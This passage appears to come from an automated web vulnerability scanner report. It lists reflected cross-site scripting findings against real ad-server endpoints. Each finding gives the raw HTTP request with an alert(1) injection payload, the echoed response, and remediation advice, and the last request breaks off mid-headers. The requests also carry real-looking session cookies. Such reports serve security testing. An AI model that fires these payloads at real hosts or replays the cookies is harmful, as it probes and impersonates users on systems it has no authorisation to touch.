var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.rubiconmcclatchy.ron/audience;sz=300x250;net=iblocal;ord=4049553634?d1401'-alert(1)-'d01cba75e60;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.5. http://a.collective-media.net/cmadj/iblocal.rubiconmcclatchy.ron/audience [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.rubiconmcclatchy.ron/audience

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ff8f'-alert(1)-'719f38ddf18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj7ff8f'-alert(1)-'719f38ddf18/iblocal.rubiconmcclatchy.ron/audience;sz=300x250;net=iblocal;ord=4049553634;ord1=908824;cmpgurl=http%253A//www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 03:11:06 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:06 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT
Content-Length: 7668

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-68133549_1303614666","http://ad.doubleclick.net/adj7ff8f'-alert(1)-'719f38ddf18/iblocal.rubiconmcclatchy.ron/audience;net=iblocal;u=,iblocal-68133549_1303614666,11f8f328940989e,gadg,dx.16;;cmw=owl;sz=300x250;net=iblocal;ord1=908824;contx=gadg;dc=w;btg=dx.16;ord=4049553634?","300"
...[SNIP]...

2.6. http://a.collective-media.net/cmadj/iblocal.rubiconmcclatchy.ron/audience [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.rubiconmcclatchy.ron/audience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4810'-alert(1)-'0cd03c4b95e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.rubiconmcclatchy.rone4810'-alert(1)-'0cd03c4b95e/audience;sz=300x250;net=iblocal;ord=4049553634;ord1=908824;cmpgurl=http%253A//www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 03:11:06 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:06 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT
Content-Length: 7660

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-85131481_1303614666","http://ad.doubleclick.net/adj/iblocal.rubiconmcclatchy.rone4810'-alert(1)-'0cd03c4b95e/audience;net=iblocal;u=,iblocal-85131481_1303614666,11f8f328940989e,gadg,dx.16;;sz=300x250;net=iblocal;ord1=908824;contx=gadg;dc=w;btg=dx.16;ord=4049553634?","300","250",true);</scr'+'ipt>
...[SNIP]...

2.7. http://a.collective-media.net/cmadj/iblocal.rubiconmcclatchy.ron/audience [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.rubiconmcclatchy.ron/audience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5783e'-alert(1)-'6610fd28a51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.rubiconmcclatchy.ron/audience5783e'-alert(1)-'6610fd28a51;sz=300x250;net=iblocal;ord=4049553634;ord1=908824;cmpgurl=http%253A//www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 03:11:06 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:06 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT
Content-Length: 7658

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-7983029_1303614666","http://ad.doubleclick.net/adj/iblocal.rubiconmcclatchy.ron/audience5783e'-alert(1)-'6610fd28a51;net=iblocal;u=,iblocal-7983029_1303614666,11f8f328940989e,gadg,dx.16;;sz=300x250;net=iblocal;ord1=908824;contx=gadg;dc=w;btg=dx.16;ord=4049553634?","300","250",true);</scr'+'ipt>
...[SNIP]...

2.8. http://a.collective-media.net/cmadj/iblocal.rubiconmcclatchy.ron/audience [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.rubiconmcclatchy.ron/audience

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b84ad'-alert(1)-'66cb81808d3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.rubiconmcclatchy.ron/audience;sz=b84ad'-alert(1)-'66cb81808d3 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 03:11:04 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:04 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:04 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:04 GMT
Content-Length: 7636

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
tiveMedia.createAndAttachAd("iblocal-17384975_1303614664","http://ad.doubleclick.net/adj/iblocal.rubiconmcclatchy.ron/audience;net=iblocal;u=,iblocal-17384975_1303614664,11f8f328940989e,none,dx.16;;sz=b84ad'-alert(1)-'66cb81808d3;contx=none;dc=w;btg=dx.16?","b84ad'-alert(1)-'66cb81808d3","",true);</scr'+'ipt>
...[SNIP]...

2.9. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.MSNcashback.com/B5398653.8

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4695"-alert(1)-"14cee7ecabd was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669f4695"-alert(1)-"14cee7ecabd&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 23 Apr 2011 14:26:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6746

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
st4GNetwork_7999_Static.jpg";
var minV = 8;
var FWH = ' width="300" height="600" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669f4695"-alert(1)-"14cee7ecabd&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/
...[SNIP]...

2.10. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.MSNcashback.com/B5398653.8

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bc2e"-alert(1)-"753a23f325e was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=19163406439bc2e"-alert(1)-"753a23f325e&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 23 Apr 2011 14:27:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6746

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
nV = 8;
var FWH = ' width="300" height="600" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=19163406439bc2e"-alert(1)-"753a23f325e&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/1%3B%3B%7Eokv%
...[SNIP]...

2.11. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.MSNcashback.com/B5398653.8

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74280"-alert(1)-"91003d35e8d was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae74280"-alert(1)-"91003d35e8d&destination=;ord=1916340643? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 23 Apr 2011 14:27:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6746

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
;
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae74280"-alert(1)-"91003d35e8d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/
...[SNIP]...

2.12. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.MSNcashback.com/B5398653.8

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 774d7"-alert(1)-"f6155fedbbb was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1774d7"-alert(1)-"f6155fedbbb&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 23 Apr 2011 14:27:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6746

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
var FWH = ' width="300" height="600" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1774d7"-alert(1)-"f6155fedbbb&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/1%3B%3B%7Eokv%3D%3Bpc%3D
...[SNIP]...

2.13. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.MSNcashback.com/B5398653.8

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d0e9"-alert(1)-"9eff1f734f was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=441477849d0e9"-alert(1)-"9eff1f734f&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 23 Apr 2011 14:26:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6742

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
jpg";
var minV = 8;
var FWH = ' width="300" height="600" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=441477849d0e9"-alert(1)-"9eff1f734f&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/db/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/
...[SNIP]...

2.14. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.MSNcashback.com/B5398653.8

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 946a5"-alert(1)-"1a0aec814e7 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G946a5"-alert(1)-"1a0aec814e7&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 23 Apr 2011 14:26:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6746

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
twork_7999_Static.jpg";
var minV = 8;
var FWH = ' width="300" height="600" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G946a5"-alert(1)-"1a0aec814e7&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B
...[SNIP]...

2.15. http://ad.doubleclick.net/adi/N3671.MSNcashback.com/B5398653.8 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.MSNcashback.com/B5398653.8

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d0ca"-alert(1)-"88694a35b67 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=2d0ca"-alert(1)-"88694a35b67 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
